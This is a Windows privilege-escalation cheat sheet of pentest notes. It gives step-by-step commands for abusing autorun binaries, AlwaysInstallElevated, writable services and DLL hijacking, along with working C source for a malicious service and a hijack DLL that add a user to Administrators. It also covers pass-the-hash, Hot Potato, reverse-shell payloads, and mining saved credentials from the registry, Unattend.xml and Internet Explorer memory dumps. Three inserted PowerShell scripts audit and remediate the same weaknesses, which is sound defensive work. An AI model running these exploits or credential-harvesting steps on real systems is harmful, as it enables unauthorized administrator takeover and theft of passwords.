⚠️ These are just some of the things you can try to escalate privilege on a Windows system. This is not meant to be an exhaustive list and only scratches the surface of Windows privilege escalation.
Be flexible and diligent in your checks. Most of these are just examples and you don't have to follow them word-for-word: check other services, other files and other registry keys, and use these as a template.
Registry
Autorun
Method 1: Registry
- Check for autorun programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- If there are any autorun programs, you may be able to overwrite the binary
- Use `accesschk.exe` or `icacls` to check your permissions on the program's directory
accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\"
- If any of the files are writable, you can overwrite one with a reverse shell payload
- When an administrative user logs on, we can get an elevated shell
- Keep a listener running continuously to catch logons
AlwaysInstallElevated
- Check if the `AlwaysInstallElevated` setting has been enabled
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
- If either of those queries returns `1`, you can get an elevated shell
- Use `msfvenom` to create an `.msi` payload and run it on the target
- Start a listener
- Run this command to install the malicious program
msiexec /quiet /qn /i <path to msi>
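As an added audit script (my own, not part of the original notes), the following PowerShell checks the two registry conditions in this section from the defender's side: whether `AlwaysInstallElevated` is set in both hives, and whether any binary started from the `HKLM` Run key is writable by a broad group or the current user. Function names are my own; it assumes PowerShell 5.1 or later on Windows.

```powershell
# Added audit script, not from the original notes. Assumes PowerShell 5.1+ on Windows.
$Fs = [System.Security.AccessControl.FileSystemRights]
# Write-type rights (Modify/FullControl are supersets; hex = GENERIC_WRITE / GENERIC_ALL).
$WriteMask = [int]$Fs::Write -bor [int]$Fs::Delete -bor [int]$Fs::ChangePermissions -bor
             [int]$Fs::TakeOwnership -bor 0x40000000 -bor 0x10000000
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE', [System.Security.Principal.WindowsIdentity]::GetCurrent().Name)
function Get-ExePathFromCommand {
    # Executable from a Run-key command line: a quoted path is taken verbatim; an unquoted
    # one is the longest leading prefix that exists as a file ("C:\Program Files\X\p.exe -arg").
    param([string]$Command)
    $c = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($c.StartsWith('"')) {
        $end = $c.IndexOf('"', 1)
        if ($end -gt 1) { return $c.Substring(1, $end - 1) }
    }
    $parts = $c -split ' '
    for ($i = $parts.Count; $i -ge 1; $i--) {
        $candidate = $parts[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $null
}
function Get-BroadWriteAccess {
    # Allow-ACEs on $Path that grant write-type rights to a broad group or to the current user.
    param([string]$Path)
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and $BroadPrincipals -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights) -band $WriteMask) -ne 0
    }
}
# 1. AlwaysInstallElevated: Windows Installer honours it only when BOTH hives hold 1.
$aie = @{}
foreach ($hive in 'HKLM', 'HKCU') {
    $key = "${hive}:\Software\Policies\Microsoft\Windows\Installer"
    $aie[$hive] = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
}
Write-Output "AlwaysInstallElevated  HKLM=$($aie.HKLM)  HKCU=$($aie.HKCU)"
if ($aie.HKLM -eq 1 -and $aie.HKCU -eq 1) {
    Write-Warning 'Enabled in both hives: any user can install an MSI as SYSTEM. Set both values to 0.'
}
# 2. Run-key entries whose binary a broad group could overwrite.
$props = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
foreach ($name in ($props.PSObject.Properties.Name | Where-Object { $_ -notin 'PSPath','PSParentPath','PSChildName','PSDrive','PSProvider' })) {
    $exe = Get-ExePathFromCommand $props.$name
    if (-not $exe) { Write-Output "[?]  $name : could not resolve '$($props.$name)'"; continue }
    $bad = Get-BroadWriteAccess $exe
    if ($bad) { Write-Warning "$name -> $exe writable by: $($bad.IdentityReference.Value -join ', ')" }
    else      { Write-Output  "[ok] $name -> $exe" }
}
```

Any warning line is a finding to fix by tightening the file ACL (or removing the autorun) rather than something to act on from the shell.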
Services
HKLM:\System\CurrentControlSet\services\regsvc
- Open PowerShell and check your permissions on this registry key
Get-Acl hklm:\System\CurrentControlSet\services\regsvc
- If your user account or a group you're a member of can register services, then you can create a malicious service to perform a privileged task
- Create a dummy Windows service; an example service (`windows_service.c`) is shown below
- Modify the source code: enter the command in `system()`
- Use the command `cmd.exe /k net localgroup administrators user /add`
- This will add the current user to the `Administrators` local group
- In Kali, compile the `.c` code to a `.exe`
x86_64-w64-mingw32-gcc windows_service.c -o privesc.exe
- Transfer `privesc.exe` to a writable folder on the target
- Register the service
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d [C:\Path\to\privesc.exe] /f
- Start the service
sc.exe start regsvc
- Confirm the current user has been added to the local administrators group
windows_service.c
```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* system() */

#define SLEEP_TIME 5000

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

void ServiceMain(int argc, char** argv);
void ControlHandler(DWORD request);

/* Add the payload here: it runs once when the service starts.
 * Replace "user" with the account name to add. */
int Run()
{
    system("cmd.exe /k net localgroup administrators user /add");
    return 0;
}

int main()
{
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = "MyService";
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;
    /* Hand control to the Service Control Manager, which calls ServiceMain */
    StartServiceCtrlDispatcher(ServiceTable);
    return 0;
}

void ServiceMain(int argc, char** argv)
{
    ServiceStatus.dwServiceType = SERVICE_WIN32;
    ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwWin32ExitCode = 0;
    ServiceStatus.dwServiceSpecificExitCode = 0;
    ServiceStatus.dwCheckPoint = 0;
    ServiceStatus.dwWaitHint = 0;

    hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler);

    Run();

    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(hStatus, &ServiceStatus);

    /* Idle until the SCM sends STOP or SHUTDOWN */
    while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
    {
        Sleep(SLEEP_TIME);
    }
    return;
}

void ControlHandler(DWORD request)
{
    switch (request)
    {
    case SERVICE_CONTROL_STOP:
    case SERVICE_CONTROL_SHUTDOWN:
        ServiceStatus.dwWin32ExitCode = 0;
        ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        SetServiceStatus(hStatus, &ServiceStatus);
        return;
    default:
        break;
    }
    SetServiceStatus(hStatus, &ServiceStatus);
    return;
}
```
File Permissions Service
- You can follow this process on other services as well
- The File Permissions Service is just used here as an example
- Check the configuration of `filepermsvc`
sc.exe qc filepermsvc
- Note that it runs as `SYSTEM`
- See if you or a group you're in can modify the service binary
accesschk64.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
- For example, if `Everyone` has `FILE_ALL_ACCESS`, you can overwrite the service binary, so when the service starts, the malicious binary is run
- Use the `windows_service.c` service from before
- Or, it could be a reverse shell to spawn a `SYSTEM` shell
- Copy `privesc.exe` as `C:\Program Files\File Permissions Service\filepermservice.exe`
- Run this command to restart the service
sc.exe stop filepermsvc && sc.exe start filepermsvc
- The current user should have been added to the local administrators group
DLL Hijacking
- In this example, a service loads a `DLL` from a directory where we have write permissions
- We can determine this by running `procmon` on the target
- Or by running the executable copied from the target on a test machine
- We can create a malicious `DLL` that will be loaded by the service instead
- Compile the C code to a DLL on Kali:
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijacked.dll
- Copy the DLL to the target path
- Start the service
sc.exe start <service>
Example DLL Code
```c
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Entry point the loader calls when the DLL is mapped into the service process.
 * The payload runs once on DLL_PROCESS_ATTACH; replace "user" with the account to add. */
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k net localgroup administrators user /add");
        ExitProcess(0);   /* terminate the host process once the payload has run */
    }
    return TRUE;
}
```
Insecure Service Permissions
- Similar to the File Permissions Service attack before
- Check a service's permissions to see if we can modify it
- In this example, we're checking `daclsvc`, but other services should be checked as well
accesschk.exe /accepteula -uwcqv daclsvc
accesschk64.exe /accepteula -wuvc daclsvc
- Query the service to see if it runs as `System`
sc.exe qc daclsvc
- If we have `SERVICE_CHANGE_CONFIG`, we can manipulate the service's configuration
sc.exe config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
- This will add the current user to the local Administrators group when the service is started or restarted
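As an added audit script (my own, not part of the original notes), this PowerShell reads each service's security descriptor, which is what the `accesschk` checks above inspect, and flags DACL entries that give Everyone, Users, Authenticated Users or INTERACTIVE the `SERVICE_CHANGE_CONFIG` right, or an owner/generic right that implies it. Function and variable names are my own; it assumes PowerShell 5.1 or later with `sc.exe` available.

```powershell
# Added audit script, not from the original notes. Assumes PowerShell 5.1+ and sc.exe.
# Service access bits from winsvc.h, plus owner/generic rights that let a caller obtain them.
$ServiceWriteBits = [ordered]@{
    SERVICE_CHANGE_CONFIG = 0x00000002   # reconfigure the service (binPath, logon account)
    WRITE_DAC             = 0x00040000   # can grant itself SERVICE_CHANGE_CONFIG
    WRITE_OWNER           = 0x00080000   # can take ownership, then rewrite the DACL
    GENERIC_WRITE         = 0x40000000   # maps to SERVICE_CHANGE_CONFIG among others
    GENERIC_ALL           = 0x10000000
}
$DangerMask = 0
foreach ($v in $ServiceWriteBits.Values) { $DangerMask = $DangerMask -bor $v }
# SIDs that mean "any logged-on user": Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE.
$BroadSids = 'S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4'

function Get-ServiceDaclFindings {
    param([string]$ServiceName)
    # sc.exe sdshow prints the service security descriptor as an SDDL string (or an error).
    $sddl = sc.exe sdshow $ServiceName | Where-Object { $_.Trim() -ne '' } | Select-Object -First 1
    if (-not $sddl -or $sddl.Trim() -notmatch '^[DOGS]:') { return }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl.Trim())
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        if ($BroadSids -notcontains $ace.SecurityIdentifier.Value) { continue }
        if (($ace.AccessMask -band $DangerMask) -eq 0) { continue }
        $rights = $ServiceWriteBits.Keys | Where-Object { $ace.AccessMask -band $ServiceWriteBits[$_] }
        [pscustomobject]@{
            Service   = $ServiceName
            RunsAs    = (Get-CimInstance Win32_Service -Filter "Name='$ServiceName'").StartName
            Principal = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value
            Rights    = $rights -join ','
        }
    }
}

# Audit every installed service. A hit means an ordinary user could repoint binPath (the
# "sc.exe config ... binpath=" step above) and have a program run as the service account.
$findings = Get-Service | ForEach-Object { Get-ServiceDaclFindings $_.Name }
if ($findings) { $findings | Format-Table -AutoSize } else { Write-Output 'No broad service DACL grants found.' }
```

Findings with `RunsAs` of `LocalSystem` are the ones to fix first; the remediation is to remove the offending ACE (for example with `sc.exe sdset`) so only administrators can reconfigure the service.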
Unquoted Service Path
- Use `sc.exe qc <service>` to query a service
- Especially useful if a service is running as `NT Authority\SYSTEM`
- Check whether the service's `BINARY_PATH_NAME` is not wrapped in quotes
- Example:
C:\Program Files\Service Directory\awesome.exe
- We need to find if any part of that path is writable
- If `C:\` is writable, we can create a `Program.exe` payload
- If `C:\Program Files\` is writable, we can create a `Service.exe` payload
- If `C:\Program Files\Service Directory\` is writable, we can create an `awesome.exe` payload
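As an added audit script (my own, not part of the original notes), this PowerShell lists every service whose `BINARY_PATH_NAME` is unquoted and contains spaces, derives the file names Windows would try before the real image in the same order the list above walks through, and prints the quoted path that fixes it. Function names are my own; it assumes PowerShell 5.1 or later, and leaves the directory permission check to `icacls` as the notes do.

```powershell
# Added audit script, not from the original notes. Assumes PowerShell 5.1+ on Windows.
function Get-UnquotedServicePath {
    # For one service, return the unquoted image path (if it contains spaces) together with
    # every file name Windows would try before the real one, in CreateProcess search order:
    # C:\Program.exe, C:\Program Files\Service.exe, ... exactly as walked through above.
    param([string]$Name, [string]$PathName, [string]$RunsAs)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return }                       # properly quoted: not affected
    $m = [regex]::Match($p, '(?i)^(.+?\.exe)')              # image ends at the first ".exe"
    if (-not $m.Success) { return }
    $image = $m.Groups[1].Value
    if ($image -notmatch ' ') { return }                     # no space: only one interpretation
    $candidates = @()
    $idx = $image.IndexOf(' ')
    while ($idx -ge 0) {
        $candidates += $image.Substring(0, $idx) + '.exe'
        $idx = $image.IndexOf(' ', $idx + 1)
    }
    [pscustomobject]@{
        Service    = $Name
        RunsAs     = $RunsAs
        Image      = $image
        Args       = $p.Substring($image.Length)             # arguments after the image, if any
        Candidates = $candidates
    }
}

$findings = Get-CimInstance Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
    Get-UnquotedServicePath -Name $_.Name -PathName $_.PathName -RunsAs $_.StartName
}
foreach ($f in $findings) {
    Write-Output "[!] $($f.Service) runs as $($f.RunsAs): $($f.Image)"
    foreach ($c in $f.Candidates) {
        # A candidate only matters if ordinary users can write its directory; check with the
        # notes' own tool and look for (W), (M) or (F) granted to Users or Everyone.
        Write-Output "    tried first: $c    -> icacls `"$(Split-Path -Parent $c)`""
    }
    # Remediation, typed in cmd.exe: quote the image and keep the original arguments.
    Write-Output "    fix: sc.exe config $($f.Service) binPath= `"\`"$($f.Image)\`"$($f.Args)`""
}
```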
Startup Applications
- In a lower privileged shell, run
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
- If `BUILTIN\Users` has `(F)`, we can add a payload there
- Use `msfvenom` to generate a reverse shell `.exe` payload
- Put the payload in the folder
- Start a listener
- Wait for an admin to log in
Passing the Hash
pth-winexe
- If you have a hash of a user
pth-winexe -U 'username%hash' //MACHINE_IP cmd.exe
- This is just an example. I've written more notes here on passing the hash.
Scheduled Tasks
- Check for scheduled tasks running as privileged accounts
- If the task is running a script, check the permissions on the script
accesschk.exe /accepteula -quvw user C:\path\to\script
- May be able to overwrite or modify the script contents
- Could run a command or reverse shell
Hot Potato
Invoke-Tater
- `Invoke-Tater.ps1`
- If the host is vulnerable to the Hot Potato privilege escalation, it will run commands as `System`, as we will be able to impersonate the SYSTEM account
- Import the script, then run
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
- The current user should now be a member of the local administrators group
Password Mining
Registry
- Search for the word `password` recursively
reg query HKLM /f password /t REG_SZ /s
- Might be something here as a quick search
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
- Spawn an admin shell from Kali
winexe -U 'username%password' //target-ip cmd.exe
- This is just an example. I've written more notes here on passing the password.
cmdkey
- Use `cmdkey /list` to list any saved credentials
- Start a reverse shell as the user
runas /savecred /user:username C:\PrivEsc\reverse.exe
C:\Windows\Panther\Unattend.xml
- Check the `<Password>` property for a `base64`-encoded password
Internet Explorer Memory Dump
- Start
msfconsole
use auxiliary/server/capture/http_basic
set uripath pwn
run
- Victim
- Open Internet Explorer
- Go to `http://kali-ip/pwn`
- Open Task Manager
- Right-click `iexplore.exe` > Image Name > Create Dump File
- Transfer the `.DMP` file to Kali
- Kali
- Check if there are any saved credentials in the IE dump
strings file.DMP | grep "Authorization: Basic"
- If so, decode the base64 string.
echo -ne "base64string" | base64 -d
GUI Apps
Run as Admin
- If a GUI app is set to run as admin at launch
- Example: MS Paint
- Launch Paint
- File > Open
- Enter `file://C:/Windows/System32/cmd.exe`
Kernel Exploits
Scripts
- Run exploit-suggesting scripts to detect kernel exploits
winPEASany.exe
Seatbelt.exe
PowerUp.ps1
SharpUp.exe